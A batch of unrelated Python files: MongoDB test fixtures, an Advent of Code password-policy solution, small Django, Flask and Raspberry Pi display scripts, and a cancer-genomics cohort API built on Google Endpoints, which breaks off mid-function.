@pytest.fixture(scope='session')
def dumbalgo():
"""Return stab algorithm class."""
return DumbAlgo
@pytest.fixture()
def exp_config():
"""Load an example database."""
with open(os.path.join(os.path.dirname(os.path.abspath(__file__)),
'experiment.yaml')) as f:
exp_config = list(yaml.safe_load_all(f))
return exp_config
@pytest.fixture(scope='session')
def database():
"""Return Mongo database object to test with example entries."""
client = MongoClient(username='user', password='pass', authSource='orion_test')
database = client.orion_test
yield database
client.close()
@pytest.fixture()
def clean_db(database, exp_config):
"""Clean insert example experiment entries to collections."""
database.experiments.drop()
database.trials.drop()
database.workers.drop()
database.resources.drop()
@pytest.fixture()
def only_experiments_db(database, exp_config):
"""Clean the database and insert only experiments."""
database.experiments.drop()
database.experiments.insert_many(exp_config[0])
database.trials.drop()
database.workers.drop()
database.resources.drop()
|
import time
import os
class Policy:
def __init__(self, n1: int, n2: int, letter: str):
assert(n1 < n2)
self.n1 = n1
self.n2 = n2
self.letter = letter
class Password:
def __init__(self, policy: Policy, password: str):
self.policy = policy
self.password = password
def validate_rule_1(self) -> bool:
# Password should contain the letter at least n1 times and at most n2 times.
count = self.password.count(self.policy.letter)
return (count >= self.policy.n1) and (count <= self.policy.n2)
# Why not do this?:
# return self.password.count(self.policy.letter) in range(self.policy.n1, self.policy.n2 + 1)
# Put simply: it's slower. Which makes sense if you think about possible ways Python could implement the check.
# That said, it's negligible at the size of the real input:
# It was about about 2 seconds slower over 10,000 iterations of the entire input file.
def validate_rule_2(self) -> bool:
# Password should contain the letter in exactly 1 of locations n1 and n2.
# We have to account for these passwords being 1-indexed in the policy.
return (self.password[self.policy.n1 - 1] == self.policy.letter) \
^ (self.password[self.policy.n2 - 1] == self.policy.letter) # ^ (xor) and != will give same result.
def parse_input(filename: str):
passwords: list[Password] = []
with open(filename, "r") as file:
for line in file:
line = line.strip().split(": ")
policy = line[0].split(" ")
policy_nums = policy[0].split("-")
passwords.append(Password(Policy(int(policy_nums[0]), int(policy_nums[1]), policy[1]), line[1]))
return passwords
def main(input_filename: str):
start_time = time.time()
passwords = parse_input(input_filename)
part1_start = time.time()
passing_policy = 0
for password in passwords:
passing_policy += password.validate_rule_1()
print(f"Part 1: {passing_policy} passwords passed policy 1.")
part2_start = time.time()
passing_policy = 0
for password in passwords:
passing_policy += password.validate_rule_2()
print(f"Part 2: {passing_policy} passwords passed policy 2.")
end_time = time.time()
print("Elapsed Time:")
print(f" Parsing: {(part1_start - start_time) * 1000:.2f} ms")
print(f" Part 1: {(part2_start - part1_start) * 1000:.2f} ms")
print(f" Part 2: {(end_time - part2_start) * 1000:.2f} ms")
print(f" Total: {(end_time - start_time) * 1000:.2f} ms")
return
if __name__ == "__main__":
os.chdir(os.path.split(__file__)[0])
main("../../inputs/2020/day02.txt")
|
from django.apps import AppConfig
class AzdiliConfig(AppConfig):
name = 'azdili'
|
#!flask/bin/python
from app import app
app.run(host="0.0.0.0", port=80, debug=True, threaded=True)
|
import sys
import time
import vcgencmd
from vcgencmd import Vcgencmd
if len(sys.argv) == 1:
logging.critical("No screen_id specified")
sys.exit(1)
screen_id = int(sys.argv[1])
def turn_off_screen():
print('turning off screen')
vcgm = Vcgencmd()
output = vcgm.display_power_off(screen_id)
def turn_on_screen():
print('turning on screen')
vcgm = Vcgencmd()
output = vcgm.display_power_on(screen_id)
vcgm = Vcgencmd()
for x in [0,1,2,3,7]:
print('{}: {}'.format(x, vcgm.display_power_state(x)))
turn_off_screen()
time.sleep(5)
turn_on_screen()
time.sleep(5)
turn_off_screen()
time.sleep(5)
turn_on_screen()
|
"""
Copyright 2015, Institute for Systems Biology
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
from datetime import datetime
import endpoints
from protorpc import messages, message_types
from protorpc import remote
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned
from django.contrib.auth.models import User as Django_User
from django.core.signals import request_finished
import django
import MySQLdb
import json
from metadata import MetadataItem, IncomingMetadataItem
from cohorts.models import Cohort as Django_Cohort, Cohort_Perms, Patients, Samples, Filters
from bq_data_access.cohort_bigquery import BigQueryCohortSupport
from api_helpers import *
logger = logging.getLogger(__name__)
INSTALLED_APP_CLIENT_ID = settings.INSTALLED_APP_CLIENT_ID
CONTROLLED_ACL_GOOGLE_GROUP = settings.ACL_GOOGLE_GROUP
DEFAULT_COHORT_NAME = 'Untitled Cohort'
IMPORTANT_FEATURES = [
'tumor_tissue_site',
'gender',
'vital_status',
'country',
'Study',
'age_at_initial_pathologic_diagnosis',
'TP53',
'RB1',
'NF1',
'APC',
'CTNNB1',
'PIK3CA',
'PTEN',
'FBXW7',
'NRAS',
'ARID1A',
'CDKN2A',
'SMAD4',
'BRAF',
'NFE2L2',
'IDH1',
'PIK3R1',
'HRAS',
'EGFR',
'BAP1',
'KRAS',
'DNAseq_data',
'mirnPlatform',
'cnvrPlatform',
'methPlatform',
'gexpPlatform',
'rppaPlatform'
]
BUILTIN_ENDPOINTS_PARAMETERS = [
'alt',
'fields',
'enum',
'enumDescriptions',
'key',
'oauth_token',
'prettyPrint',
'quotaUser',
'userIp'
]
class ReturnJSON(messages.Message):
msg = messages.StringField(1)
class FilterDetails(messages.Message):
name = messages.StringField(1)
value = messages.StringField(2)
class Cohort(messages.Message):
id = messages.StringField(1)
name = messages.StringField(2)
last_date_saved = messages.StringField(3)
perm = messages.StringField(4)
email = messages.StringField(5)
comments = messages.StringField(6)
source_type = messages.StringField(7)
source_notes = messages.StringField(8)
parent_id = messages.IntegerField(9)
filters = messages.MessageField(FilterDetails, 10, repeated=True)
num_patients = messages.StringField(11)
num_samples = messages.StringField(12)
class CohortsList(messages.Message):
items = messages.MessageField(Cohort, 1, repeated=True)
count = messages.IntegerField(2)
class CohortPatientsSamplesList(messages.Message):
patients = messages.StringField(1, repeated=True)
patient_count = messages.IntegerField(2)
samples = messages.StringField(3, repeated=True)
sample_count = messages.IntegerField(4)
cohort_id = messages.IntegerField(5)
class PatientDetails(messages.Message):
clinical_data = messages.MessageField(MetadataItem, 1)
samples = messages.StringField(2, repeated=True)
aliquots = messages.StringField(3, repeated=True)
class DataDetails(messages.Message):
SampleBarcode = messages.StringField(1)
DataCenterName = messages.StringField(2)
DataCenterType = messages.StringField(3)
DataFileName = messages.StringField(4)
DataFileNameKey = messages.StringField(5)
DatafileUploaded = messages.StringField(6)
DataLevel = messages.StringField(7)
Datatype = messages.StringField(8)
GenomeReference = messages.StringField(9)
GG_dataset_id = messages.StringField(10)
GG_readgroupset_id = messages.StringField(11)
Pipeline = messages.StringField(12)
Platform = messages.StringField(13)
platform_full_name = messages.StringField(14)
Project = messages.StringField(15)
Repository = messages.StringField(16)
SDRFFileName = messages.StringField(17)
SecurityProtocol = messages.StringField(18)
CloudStoragePath = messages.StringField(19)
class SampleDetails(messages.Message):
biospecimen_data = messages.MessageField(MetadataItem, 1)
aliquots = messages.StringField(2, repeated=True)
patient = messages.StringField(3)
data_details = messages.MessageField(DataDetails, 4, repeated=True)
data_details_count = messages.IntegerField(5)
error = messages.StringField(6)
class DataFileNameKeyList(messages.Message):
datafilenamekeys = messages.StringField(1, repeated=True)
count = messages.IntegerField(2)
class GoogleGenomicsItem(messages.Message):
SampleBarcode = messages.StringField(1)
GG_dataset_id = messages.StringField(2)
GG_readgroupset_id = messages.StringField(3)
class GoogleGenomicsList(messages.Message):
items = messages.MessageField(GoogleGenomicsItem, 1, repeated=True)
count = messages.IntegerField(2)
def are_there_bad_keys(request):
'''
Checks for unrecognized fields in an endpoint request
:param request: the request object from the endpoint
:return: boolean indicating True if bad (unrecognized) fields are present in the request
'''
unrecognized_param_dict = {
k: request.get_unrecognized_field_info(k)[0]
for k in request.all_unrecognized_fields()
if k not in BUILTIN_ENDPOINTS_PARAMETERS
}
return unrecognized_param_dict != {}
def are_there_no_acceptable_keys(request):
'''
Checks for a lack of recognized fields in an endpoints request. Used in save_cohort and preview_cohort endpoints.
:param request: the request object from the endpoint
:return: boolean indicating True if there are no recognized fields in the request.
'''
param_dict = {
k.name: request.get_assigned_value(k.name)
for k in request.all_fields()
if request.get_assigned_value(k.name)
}
return param_dict == {}
def construct_parameter_error_message(request, filter_required):
err_msg = ''
sorted_acceptable_keys = sorted([k.name for k in request.all_fields()], key=lambda s: s.lower())
unrecognized_param_dict = {
k: request.get_unrecognized_field_info(k)[0]
for k in request.all_unrecognized_fields()
if k not in BUILTIN_ENDPOINTS_PARAMETERS
}
if unrecognized_param_dict:
bad_key_str = "'" + "', '".join(unrecognized_param_dict.keys()) + "'"
err_msg += "The following filters were not recognized: {}. ".format(bad_key_str)
if filter_required:
err_msg += "You must specify at least one of the following " \
"case-sensitive filters: {}".format(sorted_acceptable_keys)
else:
err_msg += "Acceptable filters are: {}".format(sorted_acceptable_keys)
return err_msg
Cohort_Endpoints = endpoints.api(name='cohort_api', version='v1', description="Get information about "
"cohorts, patients, and samples. Create and delete cohorts.",
allowed_client_ids=[INSTALLED_APP_CLIENT_ID, endpoints.API_EXPLORER_CLIENT_ID])
@Cohort_Endpoints.api_class(resource_name='cohort_endpoints')
class Cohort_Endpoints_API(remote.Service):
GET_RESOURCE = endpoints.ResourceContainer(token=messages.StringField(1), cohort_id=messages.IntegerField(2))
@endpoints.method(GET_RESOURCE, CohortsList,
path='cohorts_list', http_method='GET', name='cohorts.list')
def cohorts_list(self, request):
'''
Returns information about cohorts a user has either READER or OWNER permission on.
Authentication is required. Optionally takes a cohort id as a parameter to
only list information about one cohort.
'''
user_email = None
cursor = None
filter_cursor = None
db = None
if endpoints.get_current_user() is not None:
user_email = endpoints.get_current_user().email()
# users have the option of pasting the access token in the query string
# or in the 'token' field in the api explorer
# but this is not required
access_token = request.get_assigned_value('token')
if access_token:
user_email = get_user_email_from_token(access_token)
cohort_id = request.get_assigned_value('cohort_id')
if user_email:
django.setup()
try:
user_id = Django_User.objects.get(email=user_email).id
except (ObjectDoesNotExist, MultipleObjectsReturned), e:
logger.warn(e)
raise endpoints.NotFoundException("%s does not have an entry in the user database." % user_email)
query_dict = {'cohorts_cohort_perms.user_id': user_id, 'cohorts_cohort.active': unicode('1')}
if cohort_id:
query_dict['cohorts_cohort.id'] = cohort_id
query_str = 'select cohorts_cohort.id, ' \
'cohorts_cohort.name, ' \
'cohorts_cohort.last_date_saved, ' \
'cohorts_cohort_perms.perm, ' \
'auth_user.email, ' \
'cohorts_cohort_comments.content as comments, ' \
'cohorts_source.type as source_type, ' \
'cohorts_source.notes as source_notes, ' \
'cohorts_source.parent_id ' \
'from cohorts_cohort_perms ' \
'join cohorts_cohort ' \
'on cohorts_cohort.id=cohorts_cohort_perms.cohort_id ' \
'join auth_user ' \
'on auth_user.id=cohorts_cohort_perms.user_id ' \
'left join cohorts_cohort_comments ' \
'on cohorts_cohort_comments.user_id=cohorts_cohort_perms.user_id ' \
'left join cohorts_source ' \
'on cohorts_source.cohort_id=cohorts_cohort_perms.cohort_id '
query_tuple = ()
if query_dict:
query_str += ' where ' + '=%s and '.join(key for key in query_dict.keys()) + '=%s'
query_tuple = tuple(value for value in query_dict.values())
filter_query_str = ''
row = None
try:
db = sql_connection()
cursor = db.cursor(MySQLdb.cursors.DictCursor)
cursor.execute(query_str, query_tuple)
data = []
for row in cursor.fetchall():
filter_query_str = 'SELECT name, value ' \
'FROM cohorts_filters ' \
'WHERE cohorts_filters.resulting_cohort_id=%s'
filter_cursor = db.cursor(MySQLdb.cursors.DictCursor)
filter_cursor.execute(filter_query_str, (str(row['id']),))
filter_data = []
for filter_row in filter_cursor.fetchall():
filter_data.append(FilterDetails(
name=str(filter_row['name']),
value=str(filter_row['value'])
))
data.append(Cohort(
id=str(row['id']),
name=str(row['name']),
last_date_saved=str(row['last_date_saved']),
perm=str(row['perm']),
email=str(row['email']),
comments=str(row['comments']),
source_type=None if row['source_type'] is None else str(row['source_type']),
source_notes=None if row['source_notes'] is None else str(row['source_notes']),
parent_id=None if row['parent_id'] is None else int(row['parent_id']),
filters=filter_data
))
return CohortsList(items=data, count=len(data))
except (IndexError, TypeError) as e:
raise endpoints.NotFoundException(
"User {}'s cohorts not found. {}: {}".format(user_email, type(e), e))
except MySQLdb.ProgrammingError as e:
msg = '{}:\n\tcohort query: {} {}\n\tfilter query: {} {}'\
.format(e, query_str, query_tuple, filter_query_str, str(row))
logger.warn(msg)
raise endpoints.BadRequestException("Error retrieving cohorts or filters. {}".format(msg))
finally:
if cursor: cursor.close()
if filter_cursor: filter_cursor.close()
if db and db.open: db.close()
request_finished.send(self)
else:
raise endpoints.UnauthorizedException("Authentication failed.")
GET_RESOURCE = endpoints.ResourceContainer(cohort_id=messages.IntegerField(1, required=True),
token=messages.StringField(2))
@endpoints.method(GET_RESOURCE, CohortPatientsSamplesList,
path='cohort_patients_samples_list', http_method='GET',
name='cohorts.cohort_patients_samples_list')
def cohort_patients_samples_list(self, request):
"""
Takes a cohort id as a required parameter and returns information about the participants
and samples in a particular cohort. Authentication is required.
User must have either READER or OWNER permissions on the cohort.
"""
db = None
cursor = None
user_email = None
if endpoints.get_current_user() is not None:
user_email = endpoints.get_current_user().email()
# users have the option of pasting the access token in the query string
# or in the 'token' field in the api explorer
# but this is not required
access_token = request.get_assigned_value('token')
if access_token:
user_email = get_user_email_from_token(access_token)
cohort_id = request.get_assigned_value('cohort_id')
if user_email:
django.setup()
try:
user_id = Django_User.objects.get(email=user_email).id
except (ObjectDoesNotExist, MultipleObjectsReturned), e:
logger.warn(e)
request_finished.send(self)
raise endpoints.UnauthorizedException("%s does not have an entry in the user database." % user_email)
cohort_perms_query = "select count(*) from cohorts_cohort_perms where user_id=%s and cohort_id=%s"
cohort_perms_tuple = (user_id, cohort_id)
cohort_query = "select count(*) from cohorts_cohort where id=%s and active=%s"
cohort_tuple = (cohort_id, unicode('0'))
try:
db = sql_connection()
cursor = db.cursor(MySQLdb.cursors.DictCursor)
cursor.execute(cohort_perms_query, cohort_perms_tuple)
result = cursor.fetchone()
if int(result['count(*)']) == 0:
error_message = "{} does not have owner or reader permissions on cohort {}.".format(user_email, cohort_id)
request_finished.send(self)
raise endpoints.ForbiddenException(error_message)
cursor.execute(cohort_query, cohort_tuple)
result = cursor.fetchone()
if int(result['count(*)']) > 0:
error_message = "Cohort {} was deleted.".format(cohort_id)
request_finished.send(self)
raise endpoints.NotFoundException(error_message)
except (IndexError, TypeError) as e:
logger.warn(e)
raise endpoints.NotFoundException("Cohort {} not found.".format(cohort_id))
except MySQLdb.ProgrammingError as e:
msg = '{}:\n\tcohort permissions query: {} {}\n\tcohort query: {} {}'\
.format(e, cohort_perms_query, cohort_perms_tuple, cohort_query, cohort_tuple)
logger.warn(msg)
raise endpoints.BadRequestException("Error retrieving cohorts or cohort permissions. {}".format(msg))
finally:
if cursor: cursor.close()
if db and db.open: db.close()
request_finished.send(self)
patient_query_str = 'select cohorts_patients.patient_id ' \
'from cohorts_patients ' \
'inner join cohorts_cohort_perms ' \
'on cohorts_cohort_perms.cohort_id=cohorts_patients.cohort_id ' \
'inner join cohorts_cohort ' \
'on cohorts_patients.cohort_id=cohorts_cohort.id ' \
'where cohorts_patients.cohort_id=%s ' \
'and cohorts_cohort_perms.user_id=%s ' \
'and cohorts_cohort.active=%s ' \
'group by cohorts_patients.patient_id '
patient_query_tuple = (cohort_id, user_id, unicode('1'))
sample_query_str = 'select cohorts_samples.sample_id ' \
'from cohorts_samples ' \
'inner join cohorts_cohort_perms ' \
'on cohorts_cohort_perms.cohort_id=cohorts_samples.cohort_id ' \
'inner join cohorts_cohort ' \
'on cohorts_samples.cohort_id=cohorts_cohort.id ' \
'where cohorts_samples.cohort_id=%s ' \
'and cohorts_cohort_perms.user_id=%s ' \
'and cohorts_cohort.active=%s ' \
'group by cohorts_samples.sample_id '
sample_query_tuple = (cohort_id, user_id, unicode('1'))
try:
db = sql_connection()
cursor = db.cursor(MySQLdb.cursors.DictCursor)
cursor.execute(patient_query_str, patient_query_tuple)
patient_data = []
for row in cursor.fetchall():
patient_data.append(row['patient_id'])
cursor.execute(sample_query_str, sample_query_tuple)
sample_data = []
for row in cursor.fetchall():
sample_data.append(row['sample_id'])
return CohortPatientsSamplesList(patients=patient_data,
patient_count=len(patient_data),
samples=sample_data,
sample_count=len(sample_data),
cohort_id=int(cohort_id))
except (IndexError, TypeError) as e:
logger.warn(e)
raise endpoints.NotFoundException("Cohort {} not found.".format(cohort_id))
except MySQLdb.ProgrammingError as e:
msg = '{}:\n\tpatient query: {} {}\n\tsample query: {} {}'\
.format(e, patient_query_str, patient_query_tuple, sample_query_str, sample_query_tuple)
logger.warn(msg)
raise endpoints.BadRequestException("Error retrieving patients or samples. {}".format(msg))
finally:
if cursor: cursor.close()
if db and db.open: db.close()
request_finished.send(self)
else:
raise endpoints.UnauthorizedException("Authentication failed.")
GET_RESOURCE = endpoints.ResourceContainer(patient_barcode=messages.StringField(1, required=True))
@endpoints.method(GET_RESOURCE, PatientDetails,
path='patient_details', http_method='GET', name='cohorts.patient_details')
def patient_details(self, request):
"""
Returns information about a specific participant,
including a list of samples and aliquots derived from this patient.
Takes a participant barcode (of length 12, *eg* TCGA-B9-7268) as a required parameter.
User does not need to be authenticated.
"""
clinical_cursor = None
sample_cursor = None
aliquot_cursor = None
db = None
patient_barcode = request.get_assigned_value('patient_barcode')
clinical_query_str = 'select * ' \
'from metadata_clinical ' \
'where ParticipantBarcode=%s' \
# % patient_barcode
query_tuple = (str(patient_barcode),)
sample_query_str = 'select SampleBarcode ' \
'from metadata_biospecimen ' \
'where ParticipantBarcode=%s'
aliquot_query_str = 'select AliquotBarcode ' \
'from metadata_data ' \
'where ParticipantBarcode=%s ' \
'group by AliquotBarcode'
try:
db = sql_connection()
clinical_cursor = db.cursor(MySQLdb.cursors.DictCursor)
clinical_cursor.execute(clinical_query_str, query_tuple)
row = clinical_cursor.fetchone()
item = MetadataItem(
age_at_initial_pathologic_diagnosis=None if "age_at_initial_pathologic_diagnosis" not in row or row["age_at_initial_pathologic_diagnosis"] is None else int(row["age_at_initial_pathologic_diagnosis"]),
anatomic_neoplasm_subdivision=str(row["anatomic_neoplasm_subdivision"]),
batch_number=None if "batch_number" not in row or row["batch_number"] is None else int(row["batch_number"]),
bcr=str(row["bcr"]),
clinical_M=str(row["clinical_M"]),
clinical_N=str(row["clinical_N"]),
clinical_stage=str(row["clinical_stage"]),
clinical_T=str(row["clinical_T"]),
colorectal_cancer=str(row["colorectal_cancer"]),
country=str(row["country"]),
days_to_birth=None if "days_to_birth" not in row or row['days_to_birth'] is None else int(row["days_to_birth"]),
days_to_death=None if "days_to_death" not in row or row['days_to_death'] is None else int(row["days_to_death"]),
days_to_initial_pathologic_diagnosis=None if "days_to_initial_pathologic_diagnosis" not in row or row['days_to_initial_pathologic_diagnosis'] is None else int(row["days_to_initial_pathologic_diagnosis"]),
days_to_last_followup=None if "days_to_last_followup" not in row or row['days_to_last_followup'] is None else int(row["days_to_last_followup"]),
days_to_submitted_specimen_dx=None if "days_to_submitted_specimen_dx" not in row or row['days_to_submitted_specimen_dx'] is None else int(row["days_to_submitted_specimen_dx"]),
Study=str(row["Study"]),
ethnicity=str(row["ethnicity"]),
frozen_specimen_anatomic_site=str(row["frozen_specimen_anatomic_site"]),
gender=str(row["gender"]),
height=None if "height" not in row or row['height'] is None else int(row["height"]),
histological_type=str(row["histological_type"]),
history_of_colon_polyps=str(row["history_of_colon_polyps"]),
history_of_neoadjuvant_treatment=str(row["history_of_neoadjuvant_treatment"]),
history_of_prior_malignancy=str(row["history_of_prior_malignancy"]),
hpv_calls=str(row["hpv_calls"]),
hpv_status=str(row["hpv_status"]),
icd_10=str(row["icd_10"]),
icd_o_3_histology=str(row["icd_o_3_histology"]),
icd_o_3_site=str(row["icd_o_3_site"]),
lymphatic_invasion=str(row["lymphatic_invasion"]),
lymphnodes_examined=str(row["lymphnodes_examined"]),
lymphovascular_invasion_present=str(row["lymphovascular_invasion_present"]),
menopause_status=str(row["menopause_status"]),
mononucleotide_and_dinucleotide_marker_panel_analysis_status=str(row["mononucleotide_and_dinucleotide_marker_panel_analysis_status"]),
mononucleotide_marker_panel_analysis_status=str(row["mononucleotide_marker_panel_analysis_status"]),
neoplasm_histologic_grade=str(row["neoplasm_histologic_grade"]),
new_tumor_event_after_initial_treatment=str(row["new_tumor_event_after_initial_treatment"]),
number_of_lymphnodes_examined=None if "number_of_lymphnodes_examined" not in row or row['number_of_lymphnodes_examined'] is None else int(row["number_of_lymphnodes_examined"]),
number_of_lymphnodes_positive_by_he=None if "number_of_lymphnodes_positive_by_he" not in row or row['number_of_lymphnodes_positive_by_he'] is None else int(row["number_of_lymphnodes_positive_by_he"]),
ParticipantBarcode=str(row["ParticipantBarcode"]),
pathologic_M=str(row["pathologic_M"]),
pathologic_N=str(row["pathologic_N"]),
pathologic_stage=str(row["pathologic_stage"]),
pathologic_T=str(row["pathologic_T"]),
person_neoplasm_cancer_status=str(row["person_neoplasm_cancer_status"]),
pregnancies=str(row["pregnancies"]),
primary_neoplasm_melanoma_dx=str(row["primary_neoplasm_melanoma_dx"]),
primary_therapy_outcome_success=str(row["primary_therapy_outcome_success"]),
prior_dx=str(row["prior_dx"]),
Project=str(row["Project"]),
psa_value=None if "psa_value" not in row or row["psa_value"] is None else float(row["psa_value"]),
race=str(row["race"]),
residual_tumor=str(row["residual_tumor"]),
tobacco_smoking_history=str(row["tobacco_smoking_history"]),
tumor_tissue_site=str(row["tumor_tissue_site"]),
tumor_type=str(row["tumor_type"]),
weiss_venous_invasion=str(row["weiss_venous_invasion"]),
vital_status=str(row["vital_status"]),
weight=None if "weight" not in row or row["weight"] is None else int(float(row["weight"])),
year_of_initial_pathologic_diagnosis=str(row["year_of_initial_pathologic_diagnosis"])
)
sample_cursor = db.cursor(MySQLdb.cursors.DictCursor)
sample_cursor.execute(sample_query_str, query_tuple)
sample_data = []
for row in sample_cursor.fetchall():
sample_data.append(row['SampleBarcode'])
aliquot_cursor = db.cursor(MySQLdb.cursors.DictCursor)
aliquot_cursor.execute(aliquot_query_str, query_tuple)
aliquot_data = []
for row in aliquot_cursor.fetchall():
aliquot_data.append(row['AliquotBarcode'])
return PatientDetails(clinical_data=item, samples=sample_data, aliquots=aliquot_data)
except (IndexError, TypeError), e:
logger.info("Patient {} not found. Error: {}".format(patient_barcode, e))
raise endpoints.NotFoundException("Patient {} not found.".format(patient_barcode))
except MySQLdb.ProgrammingError as e:
msg = '{}:\n\tpatient query: {} {}\n\tsample query: {} {}\n\taliquot query: {} {}'\
.format(e, clinical_query_str, query_tuple, sample_query_str, query_tuple,
aliquot_query_str, query_tuple)
logger.warn(msg)
raise endpoints.BadRequestException("Error retrieving patient, sample, or aliquot data. {}".format(msg))
finally:
if clinical_cursor: clinical_cursor.close()
if sample_cursor: sample_cursor.close()
if aliquot_cursor: aliquot_cursor.close()
if db and db.open: db.close()
GET_RESOURCE = endpoints.ResourceContainer(sample_barcode=messages.StringField(1, required=True),
platform=messages.StringField(2),
pipeline=messages.StringField(3))
@endpoints.method(GET_RESOURCE, SampleDetails,
path='sample_details', http_method='GET', name='cohorts.sample_details')
def sample_details(self, request):
"""
Given a sample barcode (of length 16, *eg* TCGA-B9-7268-01A), this endpoint returns
all available "biospecimen" information about this sample,
the associated patient barcode, a list of associated aliquots,
and a list of "data_details" blocks describing each of the data files associated with this sample
"""
biospecimen_cursor = None
aliquot_cursor = None
patient_cursor = None
data_cursor = None
db = None
sample_barcode = request.get_assigned_value('sample_barcode')
biospecimen_query_str = 'select * ' \
'from metadata_biospecimen ' \
'where SampleBarcode=%s'
query_tuple = (str(sample_barcode),)
extra_query_tuple = query_tuple
aliquot_query_str = 'select AliquotBarcode ' \
'from metadata_data ' \
'where SampleBarcode=%s '
patient_query_str = 'select ParticipantBarcode ' \
'from metadata_biospecimen ' \
'where SampleBarcode=%s '
data_query_str = 'select ' \
'SampleBarcode, ' \
'DataCenterName, ' \
'DataCenterType, ' \
'DataFileName, ' \
'DataFileNameKey, ' \
'DatafileUploaded, ' \
'DataLevel,' \
'Datatype,' \
'GenomeReference,' \
'GG_dataset_id, ' \
'GG_readgroupset_id, ' \
'Pipeline,' \
'Platform,' \
'platform_full_name,' \
'Project,' \
'Repository,' \
'SDRFFileName,' \
'SecurityProtocol ' \
'from metadata_data ' \
'where SampleBarcode=%s '
if request.get_assigned_value('platform') is not None:
platform = request.get_assigned_value('platform')
aliquot_query_str += ' and platform=%s '
data_query_str += ' and platform=%s '
extra_query_tuple += (str(platform),)
if request.get_assigned_value('pipeline') is not None:
pipeline = request.get_assigned_value('pipeline')
aliquot_query_str += ' and pipeline=%s '
data_query_str += ' and pipeline=%s '
extra_query_tuple += (str(pipeline),)
aliquot_query_str += ' group by AliquotBarcode'
patient_query_str += ' group by ParticipantBarcode'
try:
db = sql_connection()
biospecimen_cursor = db.cursor(MySQLdb.cursors.DictCursor)
biospecimen_cursor.execute(biospecimen_query_str, query_tuple)
row = biospecimen_cursor.fetchone()
item = MetadataItem(
avg_percent_lymphocyte_infiltration=None if "avg_percent_lymphocyte_infiltration" not in row or row["avg_percent_lymphocyte_infiltration"] is None else float(row["avg_percent_lymphocyte_infiltration"]),
avg_percent_monocyte_infiltration=None if "avg_percent_monocyte_infiltration" not in row or row["avg_percent_monocyte_infiltration"] is None else float(row["avg_percent_monocyte_infiltration"]),
avg_percent_necrosis=None if "avg_percent_necrosis" not in row or row["avg_percent_necrosis"] is None else float(row["avg_percent_necrosis"]),
avg_percent_neutrophil_infiltration=None if "avg_percent_neutrophil_infiltration" not in row or row["avg_percent_neutrophil_infiltration"] is None else float(row["avg_percent_neutrophil_infiltration"]),
avg_percent_normal_cells=None if "avg_percent_normal_cells" not in row or row["avg_percent_normal_cells"] is None else float(row["avg_percent_normal_cells"]),
avg_percent_stromal_cells=None if "avg_percent_stromal_cells" not in row or row["avg_percent_stromal_cells"] is None else float(row["avg_percent_stromal_cells"]),
avg_percent_tumor_cells=None if "avg_percent_tumor_cells" not in row or row["avg_percent_tumor_cells"] is None else float(row["avg_percent_tumor_cells"]),
avg_percent_tumor_nuclei=None if "avg_percent_tumor_nuclei" not in row or row["avg_percent_tumor_nuclei"] is None else float(row["avg_percent_tumor_nuclei"]),
batch_number=None if "batch_number" not in row or row["batch_number"] is None else int(row["batch_number"]),
bcr=str(row["bcr"]),
days_to_collection=None if "days_to_collection" not in row or row['days_to_collection'] is None else int(row["days_to_collection"]),
max_percent_lymphocyte_infiltration=None if "max_percent_lymphocyte_infiltration" not in row or row["max_percent_lymphocyte_infiltration"] is None else int(row["max_percent_lymphocyte_infiltration"]), # 46)
max_percent_monocyte_infiltration=None if "max_percent_monocyte_infiltration" not in row or row["max_percent_monocyte_infiltration"] is None else int(row["max_percent_monocyte_infiltration"]), # 47)
max_percent_necrosis=None if "max_percent_necrosis" not in row or row["max_percent_necrosis"] is None else int(row["max_percent_necrosis"]), # 48)
max_percent_neutrophil_infiltration=None if "max_percent_neutrophil_infiltration" not in row or row["max_percent_neutrophil_infiltration"] is None else int(row["max_percent_neutrophil_infiltration"]), # 49)
max_percent_normal_cells=None if "max_percent_normal_cells" not in row or row["max_percent_normal_cells"] is None else int(row["max_percent_normal_cells"]), # 50)
max_percent_stromal_cells=None if "max_percent_stromal_cells" not in row or row["max_percent_stromal_cells"] is None else int(row["max_percent_stromal_cells"]), # 51)
max_percent_tumor_cells=None if "max_percent_tumor_cells" not in row or row["max_percent_tumor_cells"] is None else int(row["max_percent_tumor_cells"]), # 52)
max_percent_tumor_nuclei=None if "max_percent_tumor_nuclei" not in row or row["max_percent_tumor_nuclei"] is None else int(row["max_percent_tumor_nuclei"]), # 53)
min_percent_lymphocyte_infiltration=None if "min_percent_lymphocyte_infiltration" not in row or row["min_percent_lymphocyte_infiltration"] is None else int(row["min_percent_lymphocyte_infiltration"]), # 55)
min_percent_monocyte_infiltration=None if "min_percent_monocyte_infiltration" not in row or row["min_percent_monocyte_infiltration"] is None else int(row["min_percent_monocyte_infiltration"]), # 56)
min_percent_necrosis=None if "min_percent_necrosis" not in row or row["min_percent_necrosis"] is None else int(row["min_percent_necrosis"]), # 57)
min_percent_neutrophil_infiltration=None if "min_percent_neutrophil_infiltration" not in row or row["min_percent_neutrophil_infiltration"] is None else int(row["min_percent_neutrophil_infiltration"]), # 58)
min_percent_normal_cells=None if "min_percent_normal_cells" not in row or row["min_percent_normal_cells"] is None else int(row["min_percent_normal_cells"]), # 59)
min_percent_stromal_cells=None if "min_percent_stromal_cells" not in row or row["min_percent_stromal_cells"] is None else int(row["min_percent_stromal_cells"]), # 60)
min_percent_tumor_cells=None if "min_percent_tumor_cells" not in row or row["min_percent_tumor_cells"] is None else int(row["min_percent_tumor_cells"]), # 61)
min_percent_tumor_nuclei=None if "min_percent_tumor_nuclei" not in row or row["min_percent_tumor_nuclei"] is None else int(row["min_percent_tumor_nuclei"]), # 62)
ParticipantBarcode=str(row["ParticipantBarcode"]),
Project=str(row["Project"]),
SampleBarcode=str(row["SampleBarcode"]),
Study=str(row["Study"])
)
aliquot_cursor = db.cursor(MySQLdb.cursors.DictCursor)
aliquot_cursor.execute(aliquot_query_str, extra_query_tuple)
aliquot_data = []
for row in aliquot_cursor.fetchall():
aliquot_data.append(row['AliquotBarcode'])
patient_cursor = db.cursor(MySQLdb.cursors.DictCursor)
patient_cursor.execute(patient_query_str, query_tuple)
row = patient_cursor.fetchone()
if row is None:
aliquot_cursor.close()
